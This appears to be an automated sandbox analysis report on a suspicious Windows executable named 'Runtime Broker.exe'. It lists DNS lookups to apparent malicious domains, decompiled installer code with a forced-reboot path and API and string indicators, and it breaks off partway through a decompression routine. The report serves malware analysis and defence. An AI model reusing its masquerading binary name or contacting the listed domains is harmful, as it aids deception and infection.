Nov 26, 2021 07:28:21.750073910 CET	53	63116	8.8.8.8	192.168.2.4
Nov 26, 2021 07:28:21.753937960 CET	64078	53	192.168.2.4	8.8.8.8
Nov 26, 2021 07:28:21.785761118 CET	53	64078	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Nov 26, 2021 07:28:21.522675991 CET	192.168.2.4	8.8.8.8	0x4c6e	Standard query (0)	google.com	A (IP address)	IN (0x0001)
Nov 26, 2021 07:28:21.584315062 CET	192.168.2.4	8.8.8.8	0xfb45	Standard query (0)	lucaespo.altervista.org	A (IP address)	IN (0x0001)
Nov 26, 2021 07:28:21.725790977 CET	192.168.2.4	8.8.8.8	0x98e3	Standard query (0)	studiofotografico35mm.altervista.org	A (IP address)	IN (0x0001)
Nov 26, 2021 07:28:21.753937960 CET	192.168.2.4	8.8.8.8	0xb49	Standard query (0)	wjecpujpanmwm.tk	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Nov 26, 2021 07:28:21.542368889 CET	8.8.8.8	192.168.2.4	0x4c6e	No error (0)	google.com		216.58.215.238	A (IP address)	IN (0x0001)
Nov 26, 2021 07:28:21.613328934 CET	8.8.8.8	192.168.2.4	0xfb45	No error (0)	lucaespo.altervista.org	lucaespo.altervista.org.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)
Nov 26, 2021 07:28:21.750073910 CET	8.8.8.8	192.168.2.4	0x98e3	Name error (3)	studiofotografico35mm.altervista.org	none	none	A (IP address)	IN (0x0001)
Nov 26, 2021 07:28:21.785761118 CET	8.8.8.8	192.168.2.4	0xb49	No error (0)	wjecpujpanmwm.tk		104.21.32.150	A (IP address)	IN (0x0001)
Nov 26, 2021 07:28:21.785761118 CET	8.8.8.8	192.168.2.4	0xb49	No error (0)	wjecpujpanmwm.tk		172.67.186.236	A (IP address)	IN (0x0001)

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

System Behavior

Analysis Process: Runtime Broker.exe PID: 1848 Parent PID: 6580

General

Start time:	07:26:10
Start date:	26/11/2021
Path:	C:\Users\user\Desktop\Runtime Broker.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Runtime Broker.exe"
Imagebase:	0x400000
File size:	18595672 bytes
MD5 hash:	ABC7A9C5B732B72A8F47FD85EE638C09
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: Runtime Broker.exe PID: 1848 Parent PID: 6580 Runtime Broker.exeCOMMON

Execution Graph

Execution Coverage:	12.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	16.7%
Total number of Nodes:	1384
Total number of Limit Nodes:	16

Executed Functions

Function 004035D8, Relevance: 86.2, APIs: 32, Strings: 17, Instructions: 410
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 81%

			_entry_() {
				signed int _t51;
				intOrPtr* _t56;
				WCHAR* _t60;
				char* _t62;
				void* _t65;
				void* _t67;
				int _t69;
				int _t71;
				int _t74;
				intOrPtr* _t75;
				int _t76;
				int _t78;
				void* _t102;
				signed int _t119;
				void* _t122;
				void* _t127;
				intOrPtr _t146;
				intOrPtr _t147;
				intOrPtr* _t148;
				int _t150;
				void* _t153;
				int _t154;
				signed int _t158;
				signed int _t163;
				signed int _t168;
				void* _t170;
				void* _t172;
				int* _t174;
				signed int _t180;
				signed int _t183;
				CHAR* _t184;
				WCHAR* _t185;
				void* _t191;
				char* _t192;
				void* _t195;
				void* _t196;
				void* _t242;

				_t170 = 0x20;
				_t150 = 0;
				 *(_t196 + 0x14) = 0;
				 *(_t196 + 0x10) = L"Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t196 + 0x1c) = 0;
				SetErrorMode(0x8001); // executed
				_t51 = GetVersion() & 0xbfffffff;
				 *0x42a26c = _t51;
				if(_t51 != 6) {
					_t148 = E00406931(0);
					if(_t148 != 0) {
						 *_t148(0xc00);
					}
				}
				_t184 = "UXTHEME";
				goto L4;
				L8:
				__imp__#17(_t191);
				__imp__OleInitialize(_t150); // executed
				 *0x42a338 = _t56;
				SHGetFileInfoW(0x421708, _t150, _t196 + 0x34, 0x2b4, _t150); // executed
				E0040653C(0x429260, L"NSIS Error");
				_t60 = GetCommandLineW();
				_t192 = L"\"C:\\Users\\jones\\Desktop\\Runtime Broker.exe\" ";
				E0040653C(_t192, _t60);
				 *0x42a260 = 0x400000;
				_t62 = _t192;
				if(L"\"C:\\Users\\jones\\Desktop\\Runtime Broker.exe\" " == 0x22) {
					_t62 =  &M00435002;
					_t170 = 0x22;
				}
				_t154 = CharNextW(E00405E3E(_t62, _t170));
				 *(_t196 + 0x18) = _t154;
				_t65 =  *_t154;
				if(_t65 == _t150) {
					L33:
					_t185 = L"C:\\Users\\jones\\AppData\\Local\\Temp\\";
					GetTempPathW(0x400, _t185);
					_t67 = E004035A7(_t154, 0);
					_t224 = _t67;
					if(_t67 != 0) {
						L36:
						DeleteFileW(L"1033"); // executed
						_t69 = E00403068(_t226,  *(_t196 + 0x1c)); // executed
						 *(_t196 + 0x10) = _t69;
						if(_t69 != _t150) {
							L48:
							E00403B19();
							__imp__OleUninitialize();
							_t238 =  *(_t196 + 0x10) - _t150;
							if( *(_t196 + 0x10) == _t150) {
								__eflags =  *0x42a314 - _t150;
								if( *0x42a314 == _t150) {
									L72:
									_t71 =  *0x42a32c;
									__eflags = _t71 - 0xffffffff;
									if(_t71 != 0xffffffff) {
										 *(_t196 + 0x10) = _t71;
									}
									ExitProcess( *(_t196 + 0x10));
								}
								_t74 = OpenProcessToken(GetCurrentProcess(), 0x28, _t196 + 0x14);
								__eflags = _t74;
								if(_t74 != 0) {
									LookupPrivilegeValueW(_t150, L"SeShutdownPrivilege", _t196 + 0x20);
									 *(_t196 + 0x34) = 1;
									 *(_t196 + 0x40) = 2;
									AdjustTokenPrivileges( *(_t196 + 0x28), _t150, _t196 + 0x24, _t150, _t150, _t150);
								}
								_t75 = E00406931(4);
								__eflags = _t75 - _t150;
								if(_t75 == _t150) {
									L70:
									_t76 = ExitWindowsEx(2, 0x80040002);
									__eflags = _t76;
									if(_t76 != 0) {
										goto L72;
									}
									goto L71;
								} else {
									_t78 =  *_t75(_t150, _t150, _t150, 0x25, 0x80040002);
									__eflags = _t78;
									if(_t78 == 0) {
										L71:
										E0040140B(9);
										goto L72;
									}
									goto L70;
								}
							}
							E00405BA2( *(_t196 + 0x10), 0x200010);
							ExitProcess(2);
						}
						if( *0x42a280 == _t150) {
							L47:
							 *0x42a32c =  *0x42a32c | 0xffffffff;
							 *(_t196 + 0x14) = E00403C0B( *0x42a32c);
							goto L48;
						}
						_t174 = E00405E3E(_t192, _t150);
						if(_t174 < _t192) {
							L44:
							_t235 = _t174 - _t192;
							 *(_t196 + 0x10) = L"Error launching installer";
							if(_t174 < _t192) {
								_t172 = E00405B0D(_t238);
								lstrcatW(_t185, L"~nsu");
								if(_t172 != _t150) {
									lstrcatW(_t185, "A");
								}
								lstrcatW(_t185, L".tmp");
								_t194 = L"C:\\Users\\jones\\Desktop";
								if(lstrcmpiW(_t185, L"C:\\Users\\jones\\Desktop") != 0) {
									_push(_t185);
									if(_t172 == _t150) {
										E00405AF0();
									} else {
										E00405A73();
									}
									SetCurrentDirectoryW(_t185);
									_t242 = L"C:\\Program Files (x86)\\WinSoft Update Service" - _t150; // 0x43
									if(_t242 == 0) {
										E0040653C(L"C:\\Program Files (x86)\\WinSoft Update Service", _t194);
									}
									E0040653C(0x42b000,  *(_t196 + 0x18));
									_t155 = "A" & 0x0000ffff;
									 *0x42b800 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
									_t195 = 0x1a;
									do {
										E00406579(_t150, 0x420f08, _t185, 0x420f08,  *((intOrPtr*)( *0x42a274 + 0x120)));
										DeleteFileW(0x420f08);
										if( *(_t196 + 0x10) != _t150 && CopyFileW(0x438800, 0x420f08, 1) != 0) {
											E00406302(_t155, 0x420f08, _t150);
											E00406579(_t150, 0x420f08, _t185, 0x420f08,  *((intOrPtr*)( *0x42a274 + 0x124)));
											_t102 = E00405B25(0x420f08);
											if(_t102 != _t150) {
												CloseHandle(_t102);
												 *(_t196 + 0x10) = _t150;
											}
										}
										 *0x42b800 =  *0x42b800 + 1;
										_t195 = _t195 - 1;
									} while (_t195 != 0);
									E00406302(_t155, _t185, _t150);
								}
								goto L48;
							}
							 *_t174 = _t150;
							_t175 =  &(_t174[2]);
							if(E00405F19(_t235,  &(_t174[2])) == 0) {
								goto L48;
							}
							E0040653C(L"C:\\Program Files (x86)\\WinSoft Update Service", _t175);
							E0040653C(L"C:\\Program Files (x86)\\WinSoft Update Service\\Lib\\site-packages\\pip\\_vendor\\distlib", _t175);
							 *(_t196 + 0x10) = _t150;
							goto L47;
						}
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_t158 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
						_t119 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t163 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
						while( *_t174 != _t158 || _t174[1] != _t119) {
							_t174 = _t174;
							if(_t174 >= _t192) {
								continue;
							}
							break;
						}
						_t150 = 0;
						goto L44;
					}
					GetWindowsDirectoryW(_t185, 0x3fb);
					lstrcatW(_t185, L"\\Temp");
					_t122 = E004035A7(_t154, _t224);
					_t225 = _t122;
					if(_t122 != 0) {
						goto L36;
					}
					GetTempPathW(0x3fc, _t185);
					lstrcatW(_t185, L"Low");
					SetEnvironmentVariableW(L"TEMP", _t185);
					SetEnvironmentVariableW(L"TMP", _t185);
					_t127 = E004035A7(_t154, _t225);
					_t226 = _t127;
					if(_t127 == 0) {
						goto L48;
					}
					goto L36;
				} else {
					do {
						_t153 = 0x20;
						if(_t65 != _t153) {
							L13:
							if( *_t154 == 0x22) {
								_t154 = _t154 + 2;
								_t153 = 0x22;
							}
							if( *_t154 != 0x2f) {
								goto L27;
							} else {
								_t154 = _t154 + 2;
								if( *_t154 == 0x53) {
									_t147 =  *((intOrPtr*)(_t154 + 2));
									if(_t147 == 0x20 || _t147 == 0) {
										 *0x42a320 = 1;
									}
								}
								asm("cdq");
								asm("cdq");
								_t168 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t180 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t168;
								if( *_t154 == (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t168) &&  *((intOrPtr*)(_t154 + 4)) == _t180) {
									_t146 =  *((intOrPtr*)(_t154 + 8));
									if(_t146 == 0x20 || _t146 == 0) {
										 *(_t196 + 0x1c) =  *(_t196 + 0x1c) | 0x00000004;
									}
								}
								asm("cdq");
								asm("cdq");
								_t163 = L" /D=" & 0x0000ffff;
								asm("cdq");
								_t183 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t163;
								if( *(_t154 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t163) ||  *_t154 != _t183) {
									goto L27;
								} else {
									 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
									__eflags = _t154;
									E0040653C(L"C:\\Program Files (x86)\\WinSoft Update Service", _t154);
									L32:
									_t150 = 0;
									goto L33;
								}
							}
						} else {
							goto L12;
						}
						do {
							L12:
							_t154 = _t154 + 2;
						} while ( *_t154 == _t153);
						goto L13;
						L27:
						_t154 = E00405E3E(_t154, _t153);
						if( *_t154 == 0x22) {
							_t154 = _t154 + 2;
						}
						_t65 =  *_t154;
					} while (_t65 != 0);
					goto L32;
				}
				L4:
				E004068C1(_t184); // executed
				_t184 =  &(_t184[lstrlenA(_t184) + 1]);
				if( *_t184 != 0) {
					goto L4;
				} else {
					E00406931(0xb);
					 *0x42a264 = E00406931(9);
					_t56 = E00406931(7);
					if(_t56 != _t150) {
						_t56 =  *_t56(0x1e);
						if(_t56 != 0) {
							 *0x42a26f =  *0x42a26f | 0x00000040;
						}
					}
					goto L8;
				}
			}

0x004035e3
0x004035e4
0x004035eb
0x004035ef
0x004035f7
0x004035fb
0x00403607
0x00403610
0x00403615
0x00403618
0x0040361f
0x00403626
0x00403626
0x0040361f
0x00403628
0x00403628
0x00403670
0x00403671
0x00403678
0x0040367e
0x00403694
0x004036a4
0x004036a9
0x004036af
0x004036b6
0x004036c3
0x004036cd
0x004036cf
0x004036d3
0x004036d8
0x004036d8
0x004036e7
0x004036e9
0x004036ed
0x004036f3
0x0040380a
0x00403810
0x0040381b
0x0040381d
0x00403822
0x00403824
0x0040387c
0x00403881
0x0040388b
0x00403892
0x00403896
0x00403947
0x00403947
0x0040394c
0x00403952
0x00403957
0x00403a7d
0x00403a83
0x00403b01
0x00403b01
0x00403b06
0x00403b09
0x00403b0b
0x00403b0b
0x00403b13
0x00403b13
0x00403a93
0x00403a99
0x00403a9b
0x00403aa8
0x00403abb
0x00403ac3
0x00403acb
0x00403acb
0x00403ad3
0x00403ad8
0x00403adf
0x00403aed
0x00403af0
0x00403af6
0x00403af8
0x00000000
0x00000000
0x00000000
0x00403ae1
0x00403ae7
0x00403ae9
0x00403aeb
0x00403afa
0x00403afc
0x00000000
0x00403afc
0x00000000
0x00403aeb
0x00403adf
0x00403966
0x0040396d
0x0040396d
0x004038a2
0x00403937
0x00403937
0x00403943
0x00000000
0x00403943
0x004038af
0x004038b3
0x00403901
0x00403901
0x00403903
0x0040390b
0x0040397e
0x00403980
0x00403987
0x0040398f
0x0040398f
0x0040399a
0x0040399f
0x004039ae
0x004039b2
0x004039b3
0x004039bc
0x004039b5
0x004039b5
0x004039b5
0x004039c2
0x004039c8
0x004039cf
0x004039d7
0x004039d7
0x004039e5
0x004039f1
0x004039ff
0x00403a04
0x00403a0a
0x00403a16
0x00403a1c
0x00403a26
0x00403a3c
0x00403a4d
0x00403a53
0x00403a5a
0x00403a5d
0x00403a63
0x00403a63
0x00403a5a
0x00403a67
0x00403a6e
0x00403a6e
0x00403a73
0x00403a73
0x00000000
0x004039ae
0x0040390d
0x00403910
0x0040391b
0x00000000
0x00000000
0x00403923
0x0040392e
0x00403933
0x00000000
0x00403933
0x004038bc
0x004038d4
0x004038e5
0x004038e6
0x004038ea
0x004038ec
0x004038fa
0x004038fd
0x00000000
0x00000000
0x00000000
0x004038fd
0x004038ff
0x00000000
0x004038ff
0x0040382c
0x00403838
0x0040383d
0x00403842
0x00403844
0x00000000
0x00000000
0x0040384c
0x00403854
0x00403865
0x0040386d
0x0040386f
0x00403874
0x00403876
0x00000000
0x00000000
0x00000000
0x004036f9
0x004036f9
0x004036fb
0x004036ff
0x00403708
0x0040370c
0x00403711
0x00403712
0x00403712
0x00403717
0x00000000
0x0040371d
0x0040371e
0x00403723
0x00403725
0x0040372d
0x00403734
0x00403734
0x0040372d
0x00403745
0x00403758
0x00403759
0x0040376e
0x00403773
0x00403777
0x00403780
0x00403788
0x0040378f
0x0040378f
0x00403788
0x0040379b
0x004037ae
0x004037af
0x004037c4
0x004037ca
0x004037ce
0x00000000
0x004037f5
0x004037f5
0x004037fa
0x00403803
0x00403808
0x00403808
0x00000000
0x00403808
0x004037ce
0x00000000
0x00000000
0x00000000
0x00403701
0x00403701
0x00403702
0x00403703
0x00000000
0x004037d6
0x004037dd
0x004037e3
0x004037e6
0x004037e6
0x004037e7
0x004037ea
0x00000000
0x004037f3
0x0040362d
0x0040362e
0x0040363a
0x00403641
0x00000000
0x00403643
0x00403645
0x00403653
0x00403658
0x0040365f
0x00403663
0x00403667
0x00403669
0x00403669
0x00403667
0x00000000
0x0040365f

APIs

SetErrorMode.KERNELBASE ref: 004035FB
GetVersion.KERNEL32 ref: 00403601
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403634
#17.COMCTL32(?,00000007,00000009,0000000B), ref: 00403671
OleInitialize.OLE32(00000000), ref: 00403678
SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 00403694
GetCommandLineW.KERNEL32(00429260,NSIS Error,?,00000007,00000009,0000000B), ref: 004036A9
CharNextW.USER32(00000000,"C:\Users\user\Desktop\Runtime Broker.exe" ,00000020,"C:\Users\user\Desktop\Runtime Broker.exe" ,00000000,?,00000007,00000009,0000000B), ref: 004036E1

Part of subcall function 00406931: GetModuleHandleA.KERNEL32(?,00000020,?,0040364A,0000000B), ref: 00406943
Part of subcall function 00406931: GetProcAddress.KERNEL32(00000000,?), ref: 0040695E

GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 0040381B
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 0040382C
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403838
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 0040384C
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403854
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 00403865
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 0040386D
DeleteFileW.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 00403881

Part of subcall function 0040653C: lstrcpynW.KERNEL32(?,?,00000400,004036A9,00429260,NSIS Error,?,00000007,00000009,0000000B), ref: 00406549

OleUninitialize.OLE32(00000007,?,00000007,00000009,0000000B), ref: 0040394C
ExitProcess.KERNEL32 ref: 0040396D
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403980
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328), ref: 0040398F
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 0040399A
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Runtime Broker.exe" ,00000000,00000007,?,00000007,00000009,0000000B), ref: 004039A6
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004039C2
DeleteFileW.KERNEL32(00420F08,00420F08,?,0042B000,00000009,?,00000007,00000009,0000000B), ref: 00403A1C
CopyFileW.KERNEL32(00438800,00420F08,00000001,?,00000007,00000009,0000000B), ref: 00403A30
CloseHandle.KERNEL32(00000000,00420F08,00420F08,?,00420F08,00000000,?,00000007,00000009,0000000B), ref: 00403A5D
GetCurrentProcess.KERNEL32(00000028,0000000B,00000007,00000009,0000000B), ref: 00403A8C
OpenProcessToken.ADVAPI32(00000000), ref: 00403A93
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA8
AdjustTokenPrivileges.ADVAPI32 ref: 00403ACB
ExitWindowsEx.USER32(00000002,80040002), ref: 00403AF0
ExitProcess.KERNEL32 ref: 00403B13

Strings

Error launching installer, xrefs: 00403903
NSIS Error, xrefs: 0040369A
1033, xrefs: 0040387C
TMP, xrefs: 00403868
SeShutdownPrivilege, xrefs: 00403AA2
TEMP, xrefs: 00403860
\Temp, xrefs: 00403832
C:\Users\user\Desktop, xrefs: 0040399F, 004039A4, 004039D1
C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\distlib, xrefs: 00403929
Low, xrefs: 0040384E
Error writing temporary file. Make sure your temp folder is valid., xrefs: 004035EF
UXTHEME, xrefs: 00403628, 0040362D, 00403633
~nsu, xrefs: 00403978
C:\Users\user\AppData\Local\Temp\, xrefs: 00403810, 00403815, 0040382B, 00403837, 00403846, 00403853, 0040385F, 00403867, 0040397D, 0040398E, 00403999, 004039A5, 004039B2, 004039C1, 00403A72
.tmp, xrefs: 00403994
"C:\Users\user\Desktop\Runtime Broker.exe" , xrefs: 004036AF, 004036B5, 004038A9
C:\Program Files (x86)\WinSoft Update Service, xrefs: 004037FE, 0040391E, 004039C8, 004039D2

Memory Dump Source

Source File: 00000000.00000002.920981196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.920959432.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921010628.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921033806.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921051834.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921095528.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921117570.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921134004.000000000043B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Runtime Broker.jbxd

Similarity

API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
String ID: "C:\Users\user\Desktop\Runtime Broker.exe" $.tmp$1033$C:\Program Files (x86)\WinSoft Update Service$C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\distlib$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 3441113951-1551108608
Opcode ID: 5b49f6961a51f1b38458c617fcd93ae12640fdf3a7a65fecc0c364045a1ff512
Instruction ID: 2d933c795242ec911d1e8c81cb1b116df6d8be9c0bdf84dd3ae94b8088f318b1
Opcode Fuzzy Hash: 5b49f6961a51f1b38458c617fcd93ae12640fdf3a7a65fecc0c364045a1ff512
Instruction Fuzzy Hash: 7CD1F6B1200310AAD720BF759D49B2B3AADEB40709F51443FF881B62D1DB7D8956C76E

Uniqueness

Uniqueness Score: -1.00%

Function 00406C5B, Relevance: 5.4, APIs: 4, Instructions: 382
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00406C5B() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
